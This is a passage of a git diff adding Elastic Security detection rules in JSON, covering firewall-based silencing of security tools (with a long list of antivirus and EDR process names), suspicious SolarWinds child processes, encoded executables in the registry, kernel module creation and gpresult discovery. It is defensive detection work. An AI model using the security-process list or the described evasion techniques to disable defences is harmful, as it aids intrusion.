\"submitv.exe\",\n \"av_task.exe\", \"fortiwf.exe\", \"fortiwadbd.exe\", \"fcauth.exe\", \"fcdblog.exe\", \"fcmgr.exe\", \"fortiwad.exe\",\n \"fortiproxy.exe\", \"fortiscand.exe\", \"fortivpnst.exe\", \"ipsec.exe\", \"fcwscd7.exe\", \"fcasc.exe\", \"fchelper.exe\",\n \"forticlient.exe\",\"fcwsc.exe\", \"FortiClient.exe\", \"fmon.exe\", \"FSSOMA.exe\", \"FCVbltScan.exe\", \"FortiESNAC.exe\",\n \"EPCUserAvatar.exe\", \"FortiAvatar.exe\", \"FortiClient_Diagnostic_Tool.exe\", \"FortiSSLVPNdaemon.exe\", \"avp.exe\",\n \"FCConfig.exe\", \"avpsus.exe\", \"klnagent.exe\", \"klnsacwsrv.exe\", \"kl_platf.exe\", \"stpass.exe\", \"klnagwds.exe\",\n \"mbae.exe\", \"mbae64.exe\", \"mbae-svc.exe\", \"mbae-uninstaller.exe\", \"mbaeLoader32.exe\", \"mbaeloader64.exe\",\n \"mbam-dor.exe\", \"mbamgui.exe\", \"mbamservice.exe\", \"mbamtrayctrl.exe\", \"mbampt.exe\", \"mbamscheduler.exe\",\n \"Coreinst.exe\", \"mbae-setup.exe\", \"mcupdate.exe\", \"ProtectedModuleHost.exe\", \"ESConfigTool.exe\", \"FWInstCheck.exe\",\n \"FwWindowsFirewallHandler.exe\", \"mfeesp.exe\", \"mfefw.exe\", \"mfeProvisionModeUtility.exe\", \"mfetp.exe\", \"avpui.exe\", \n \"WscAVExe.exe\", \"mcshield.exe\", \"McChHost.exe\", \"mfewc.exe\", \"mfewch.exe\", \"mfewcui.exe\", \"fwinfo.exe\",\n \"mfecanary.exe\", \"mfefire.exe\", \"mfehidin.exe\", \"mfemms.exe\", \"mfevtps.exe\", \"mmsinfo.exe\", \"vtpinfo.exe\",\n \"MarSetup.exe\", \"mctray.exe\", \"masvc.exe\", \"macmnsvc.exe\", \"McAPExe.exe\", \"McPvTray.exe\", \"mcods.exe\",\n \"mcuicnt.exe\", \"mcuihost.exe\", \"xtray.exe\", \"McpService.exe\", \"epefprtrainer.exe\", \"mfeffcoreservice.exe\",\n \"MfeEpeSvc.exe\", \"qualysagent.exe\", \"QualysProxy.exe\", \"QualysAgentUI.exe\", \"SVRTgui.exe\", \"SVRTcli.exe\",\n \"SVRTcli.exe\", \"SVRTgui.exe\", \"SCTCleanupService.exe\", \"SVRTservice.exe\", \"native.exe\", \"SCTBootTasks.exe\",\n \"ALMon.exe\", \"SAA.exe\", \"SUMService.exe\", \"ssp.exe\", \"SCFService.exe\", \"SCFManager.exe\", \"spa.exe\", \"cabarc.exe\",\n \"sargui.exe\", \"sntpservice.exe\", \"McsClient.exe\", \"McsAgent.exe\", \"McsHeartbeat.exe\", \"SAVAdminService.exe\",\n \"sav32cli.exe\", \"ForceUpdateAlongSideSGN.exe\", \"SAVCleanupService.exe\", \"SavMain.exe\", \"SavProgress.exe\", \n \"SavProxy.exe\", \"SavService.exe\", \"swc_service.exe\", \"swi_di.exe\", \"swi_service.exe\", \"swi_filter.exe\",\n \"ALUpdate.exe\", \"SophosUpdate.exe\", \"ALsvc.exe\", \"SophosAlert.exe\", \"osCheck.exe\", \"N360Downloader.exe\",\n \"InstWrap.exe\", \"symbos.exe\", \"nss.exe\", \"symcorpui.exe\", \"isPwdSvc.exe\", \"ccsvchst.exe\", \"ntrmv.exe\",\n \"pccntmon.exe\", \"AosUImanager.exe\", \"NTRTScan.exe\", \"TMAS_OL.exe\", \"TMAS_OLImp.exe\", \"TMAS_OLSentry.exe\",\n \"ufnavi.exe\", \"Clnrbin.exe\", \"vizorhtmldialog.exe\", \"pwmConsole.exe\", \"PwmSvc.exe\", \"coreServiceShell.exe\",\n \"ds_agent.exe\", \"SfCtlCom.exe\", \"MBAMHelper.exe\", \"cb.exe\", \"smc.exe\", \"tda.exe\", \"xagtnotif.exe\", \"ekrn.exe\",\n \"dsa.exe\", \"Notifier.exe\", \"rphcp.exe\", \"lc_sensor.exe\", \"CSFalconService.exe\", \"CSFalconController.exe\",\n \"SenseSampleUploader.exe\", \"windefend.exe\", \"MSASCui.exe\", \"MSASCuiL.exe\", \"msmpeng.exe\", \"msmpsvc.exe\",\n \"MsSense.exe\", \"esensor.exe\", \"sentinelone.exe\", \"tmccsf.exe\", \"csfalconcontainer.exe\", \"sensecncproxy.exe\",\n \"splunk.exe\", \"sysmon.exe\", \"sysmon64.exe\", \"taniumclient.exe\"\n )] with runs=5\n", + "references": [ + "https://github.com/dsnezhkov/shutter/tree/main", + "https://github.com/netero1010/EDRSilencer/tree/main", + "https://www.mdsec.co.uk/2023/09/nighthawk-0-2-6-three-wise-monkeys/", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5157", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5152" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.computer_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "92d3a04e-6487-4b62-892d-70e640a590dc", + "setup": "## Setup\n\nThe 'Filtering Platform Connection' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nFiltering Platform Connection (Success,Failure)\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.004", + "name": "Disable or Modify System Firewall", + "reference": "https://attack.mitre.org/techniques/T1562/004/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 3 + }, + "id": "92d3a04e-6487-4b62-892d-70e640a590dc_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_109.json b/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_109.json new file mode 100644 index 00000000000..f398a3cd1fd --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_109.json @@ -0,0 +1,118 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A suspicious SolarWinds child process was detected, which may indicate an attempt to execute malicious programs.", + "false_positives": [ + "Trusted SolarWinds child processes, verify process details such as network connections and file writes." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious SolarWinds Child Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name: (\"SolarWinds.BusinessLayerHost.exe\", \"SolarWinds.BusinessLayerHostx64.exe\") and\n not (\n process.name : (\n \"APMServiceControl*.exe\",\n \"ExportToPDFCmd*.Exe\",\n \"SolarWinds.Credentials.Orion.WebApi*.exe\",\n \"SolarWinds.Orion.Topology.Calculator*.exe\",\n \"Database-Maint.exe\",\n \"SolarWinds.Orion.ApiPoller.Service.exe\",\n \"WerFault.exe\",\n \"WerMgr.exe\",\n \"SolarWinds.BusinessLayerHost.exe\",\n \"SolarWinds.BusinessLayerHostx64.exe\",\n \"SolarWinds.Topology.Calculator.exe\",\n \"SolarWinds.Topology.Calculatorx64.exe\",\n \"SolarWinds.APM.RealTimeProcessPoller.exe\") and\n process.code_signature.trusted == true\n ) and\n not process.executable : (\"?:\\\\Windows\\\\SysWOW64\\\\ARP.EXE\", \"?:\\\\Windows\\\\SysWOW64\\\\lodctr.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\unlodctr.exe\")\n", + "references": [ + "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", + "https://github.com/mandiant/sunburst_countermeasures/blob/main/rules/SUNBURST/hxioc/SUNBURST%20SUSPICIOUS%20CHILD%20PROCESSES%20(METHODOLOGY).ioc" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "93b22c0a-06a0-4131-b830-b10d5e166ff4", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1106", + "name": "Native API", + "reference": "https://attack.mitre.org/techniques/T1106/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1195", + "name": "Supply Chain Compromise", + "reference": "https://attack.mitre.org/techniques/T1195/", + "subtechnique": [ + { + "id": "T1195.002", + "name": "Compromise Software Supply Chain", + "reference": "https://attack.mitre.org/techniques/T1195/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "93b22c0a-06a0-4131-b830-b10d5e166ff4_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_110.json b/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_110.json new file mode 100644 index 00000000000..922892d43b1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/93b22c0a-06a0-4131-b830-b10d5e166ff4_110.json @@ -0,0 +1,118 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A suspicious SolarWinds child process was detected, which may indicate an attempt to execute malicious programs.", + "false_positives": [ + "Trusted SolarWinds child processes, verify process details such as network connections and file writes." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious SolarWinds Child Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name: (\"SolarWinds.BusinessLayerHost.exe\", \"SolarWinds.BusinessLayerHostx64.exe\") and\n not (\n process.name : (\n \"APMServiceControl*.exe\",\n \"ExportToPDFCmd*.Exe\",\n \"SolarWinds.Credentials.Orion.WebApi*.exe\",\n \"SolarWinds.Orion.Topology.Calculator*.exe\",\n \"Database-Maint.exe\",\n \"SolarWinds.Orion.ApiPoller.Service.exe\",\n \"WerFault.exe\",\n \"WerMgr.exe\",\n \"SolarWinds.BusinessLayerHost.exe\",\n \"SolarWinds.BusinessLayerHostx64.exe\",\n \"SolarWinds.Topology.Calculator.exe\",\n \"SolarWinds.Topology.Calculatorx64.exe\",\n \"SolarWinds.APM.RealTimeProcessPoller.exe\") and\n process.code_signature.trusted == true\n ) and\n not process.executable : (\"?:\\\\Windows\\\\SysWOW64\\\\ARP.EXE\", \"?:\\\\Windows\\\\SysWOW64\\\\lodctr.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\unlodctr.exe\")\n", + "references": [ + "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", + "https://github.com/mandiant/sunburst_countermeasures/blob/main/rules/SUNBURST/hxioc/SUNBURST%20SUSPICIOUS%20CHILD%20PROCESSES%20(METHODOLOGY).ioc" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "93b22c0a-06a0-4131-b830-b10d5e166ff4", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1106", + "name": "Native API", + "reference": "https://attack.mitre.org/techniques/T1106/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1195", + "name": "Supply Chain Compromise", + "reference": "https://attack.mitre.org/techniques/T1195/", + "subtechnique": [ + { + "id": "T1195.002", + "name": "Compromise Software Supply Chain", + "reference": "https://attack.mitre.org/techniques/T1195/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "93b22c0a-06a0-4131-b830-b10d5e166ff4_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/93c1ce76-494c-4f01-8167-35edfb52f7b1_106.json b/packages/security_detection_engine/kibana/security_rule/93c1ce76-494c-4f01-8167-35edfb52f7b1_106.json new file mode 100644 index 00000000000..9e81dfbefbd --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/93c1ce76-494c-4f01-8167-35edfb52f7b1_106.json @@ -0,0 +1,75 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies registry write modifications to hide an encoded portable executable. This could be indicative of adversary defense evasion by avoiding the storing of malicious content directly on disk.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Encoded Executable Stored in the Registry", + "query": "registry where host.os.type == \"windows\" and\n/* update here with encoding combinations */\n registry.data.strings : \"TVqQAAMAAAAEAAAA*\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + } + ], + "risk_score": 47, + "rule_id": "93c1ce76-494c-4f01-8167-35edfb52f7b1", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + }, + { + "id": "T1140", + "name": "Deobfuscate/Decode Files or Information", + "reference": "https://attack.mitre.org/techniques/T1140/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "93c1ce76-494c-4f01-8167-35edfb52f7b1_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/93c1ce76-494c-4f01-8167-35edfb52f7b1_107.json b/packages/security_detection_engine/kibana/security_rule/93c1ce76-494c-4f01-8167-35edfb52f7b1_107.json new file mode 100644 index 00000000000..f5f20c34b7b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/93c1ce76-494c-4f01-8167-35edfb52f7b1_107.json @@ -0,0 +1,75 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies registry write modifications to hide an encoded portable executable. This could be indicative of adversary defense evasion by avoiding the storing of malicious content directly on disk.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Encoded Executable Stored in the Registry", + "query": "registry where host.os.type == \"windows\" and\n/* update here with encoding combinations */\n registry.data.strings : \"TVqQAAMAAAAEAAAA*\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + } + ], + "risk_score": 47, + "rule_id": "93c1ce76-494c-4f01-8167-35edfb52f7b1", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + }, + { + "id": "T1140", + "name": "Deobfuscate/Decode Files or Information", + "reference": "https://attack.mitre.org/techniques/T1140/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "93c1ce76-494c-4f01-8167-35edfb52f7b1_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/947827c6-9ed6-4dec-903e-c856c86e72f3_3.json b/packages/security_detection_engine/kibana/security_rule/947827c6-9ed6-4dec-903e-c856c86e72f3_3.json new file mode 100644 index 00000000000..de2fdac8231 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/947827c6-9ed6-4dec-903e-c856c86e72f3_3.json @@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies activity related to loading kernel modules on Linux via creation of new ko files in the LKM directory.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Creation of Kernel Module", + "query": "file where host.os.type == \"linux\" and event.type in (\"change\", \"creation\") and file.path : \"/lib/modules/*\" and\nfile.extension == \"ko\" and not process.name : (\n \"dpkg\", \"systemd\", \"falcon-sensor*\", \"dnf\", \"yum\", \"rpm\", \"cp\"\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "947827c6-9ed6-4dec-903e-c856c86e72f3", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Rule Type: BBR", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.006", + "name": "Kernel Modules and Extensions", + "reference": "https://attack.mitre.org/techniques/T1547/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "947827c6-9ed6-4dec-903e-c856c86e72f3_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_7.json b/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_7.json new file mode 100644 index 00000000000..4d25bb7ede2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_7.json @@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the usage of gpresult.exe to query group policy objects. Attackers may query group policy objects during the reconnaissance phase after compromising a system to gain a better understanding of the active directory environment and possible methods to escalate privileges or move laterally.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Group Policy Discovery via Microsoft GPResult Utility", + "note": "## Triage and analysis\n\n### Investigating Group Policy Discovery via Microsoft GPResult Utility\n\nGroup Policy is a Windows feature that allows administrators to manage and configure settings for users and computers in an Active Directory environment. The Microsoft GPResult utility (gpresult.exe) is a command-line tool used to query and display Group Policy Objects (GPOs) applied to a system. Attackers may abuse this utility to gain insights into the active directory environment and identify potential privilege escalation or lateral movement opportunities.\n\nThe detection rule 'Group Policy Discovery via Microsoft GPResult Utility' is designed to identify the usage of gpresult.exe with specific arguments (\"/z\", \"/v\", \"/r\", \"/x\") that are commonly used by adversaries during the reconnaissance phase to perform group policy discovery.\n\n#### Possible investigation steps\n\n- Review the alert details to understand the context of the gpresult.exe usage, such as the user account, system, and time of execution.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate any abnormal behavior by the parent process, such as network connections, registry or file modifications, and any other spawned child processes.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n(process.name: \"gpresult.exe\" or ?process.pe.original_file_name == \"gprslt.exe\") and process.args: (\"/z\", \"/v\", \"/r\", \"/x\")\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "94a401ba-4fa2-455c-b7ae-b6e037afc0b7", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1615", + "name": "Group Policy Discovery", + "reference": "https://attack.mitre.org/techniques/T1615/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "94a401ba-4fa2-455c-b7ae-b6e037afc0b7_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_8.json b/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_8.json new file mode 100644 index 00000000000..0c7cbd8a76d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/94a401ba-4fa2-455c-b7ae-b6e037afc0b7_8.json @@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the usage of gpresult.exe to query group policy objects. Attackers may query group policy objects during the reconnaissance phase after compromising a system to gain a better understanding of the active directory environment and possible methods to escalate privileges or move laterally.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Group Policy Discovery via Microsoft GPResult Utility", + "note": "## Triage and analysis\n\n### Investigating Group Policy Discovery via Microsoft GPResult Utility\n\nGroup Policy is a Windows feature that allows administrators to manage and configure settings for users and computers in an Active Directory environment. The Microsoft GPResult utility (gpresult.exe) is a command-line tool used to query and display Group Policy Objects (GPOs) applied to a system. Attackers may abuse this utility to gain insights into the active directory environment and identify potential privilege escalation or lateral movement opportunities.\n\nThe detection rule 'Group Policy Discovery via Microsoft GPResult Utility' is designed to identify the usage of gpresult.exe with specific arguments (\"/z\", \"/v\", \"/r\", \"/x\") that are commonly used by adversaries during the reconnaissance phase to perform group policy discovery.\n\n#### Possible investigation steps\n\n- Review the alert details to understand the context of the gpresult.exe usage, such as the user account, system, and time of execution.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate any abnormal behavior by the parent process, such as network connections, registry or file modifications, and any other spawned child processes.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n(process.name: \"gpresult.exe\" or ?process.pe.original_file_name == \"gprslt.exe\") and process.args: (\"/z\", \"/v\", \"/r\", \"/x\")\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "94a401ba-4fa2-455c-b7ae-b6e037afc0b7", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE 